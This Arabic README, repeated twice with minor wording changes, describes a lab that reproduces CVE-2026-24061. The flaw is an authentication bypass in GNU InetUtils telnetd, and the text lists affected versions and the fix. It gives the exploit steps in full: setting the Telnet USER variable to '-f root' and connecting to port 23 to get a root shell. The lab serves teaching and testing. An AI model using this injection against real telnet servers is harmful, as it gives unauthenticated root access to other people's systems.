
مختبر إعادة إنتاج لـ CVE-2026-24061، وهو تجاوز للمصادقة في GNU InetUtils telnetd. يوفر بيئة معزولة قائمة على Vagrant وتعليمات استغلال خطوة بخطوة لإظهار الوصول إلى جذر الصدفة (root shell).
⚠️ لأغراض تعليمية فقط. بيئة معملية معزولة.
تجاوز حرج للمصادقة (CVSS 9.8) في GNU InetUtils telnetd ≤ 2.7.
من خلال حقن -f root كقيمة لمتغير USER عبر خيار Telnet NEW_ENVIRON،
يستطيع مهاجم غير مصادَق الحصول على shell root دون أي كلمة مرور.
يُمرَّر متغير USER المستلَم من العميل أثناء التفاوض عبر Telnet
مباشرة إلى /usr/bin/login دون تعقيم:
/usr/bin/login -p -f root
يخبر الخيار -f الأمر login بتخطي التحقق من كلمة المرور للمستخدم المعني.
هذا السلوك موثّق في RFC 1572 (القسم 7) كخطر معروف — ومع ذلك بقيت
الثغرة موجودة في inetutils لأكثر من عقد.
GNU InetUtils telnetd 1.9.3 حتى 2.7
قم بالترقية إلى GNU InetUtils ≥ 2.7-2
يستخدم هذا المختبر Vagrant لتجهيز جهاز افتراضي حقيقي ومعزول يشغّل الإصدار الضعيف من telnetd (inetutils 2.5، مُجمَّع من المصدر)، ليكون أقرب ما يمكن إلى بيئة حقيقية.
المتطلبات: تثبيت Vagrant + VirtualBox على جهازك.
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up
يبدأ الجهاز الافتراضي بعنوان IP 192.168.56.10 ويكون telnetd في وضع الاستماع على المنفذ 23.

من جهازك المضيف:
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23
يُحقن متغير USER عبر خيار NEW_ENVIRON في Telnet أثناء مرحلة التفاوض — قبل ظهور موجه تسجيل الدخول.

Agokoli
⚠️ استخدام تعليمي فقط. بيئة معزولة.
تجاوز حرج للمصادقة (CVSS 9.8) في GNU InetUtils telnetd ≤ 2.7.
من خلال حقن -f root كقيمة لمتغير USER عبر خيار Telnet NEW_ENVIRON،
يستطيع مهاجم غير مصادَق الحصول على shell root دون أي كلمة مرور.
يُمرَّر متغير USER المستلَم من العميل أثناء التفاوض عبر Telnet
مباشرة إلى /usr/bin/login دون تحقق:
/usr/bin/login -p -f root
يخبر الخيار -f الأمر login بعدم التحقق من كلمة المرور للمستخدم المعني.
هذا الخطر موثّق في RFC 1572 (القسم 7) — ومع ذلك بقيت الثغرة
موجودة في inetutils لأكثر من عقد.
GNU InetUtils telnetd 1.9.3 حتى 2.7
قم بالتحديث إلى GNU InetUtils ≥ 2.7-2
يستخدم هذا المختبر Vagrant لتجهيز جهاز افتراضي حقيقي ومعزول يشغّل الإصدار الضعيف من telnetd (inetutils 2.5، مُجمَّع من المصدر)، ليكون أقرب ما يمكن إلى بيئة حقيقية.
المتطلبات: تثبيت Vagrant + VirtualBox على جهازك.
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up
يبدأ الجهاز الافتراضي بعنوان IP 192.168.56.10 ويكون telnetd في وضع الاستماع على المنفذ 23.

من جهازك المضيف:
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23
يُحقن متغير USER عبر خيار NEW_ENVIRON في بروتوكول Telnet أثناء
مرحلة التفاوض — حتى قبل ظهور الموجه login:.

Agokoli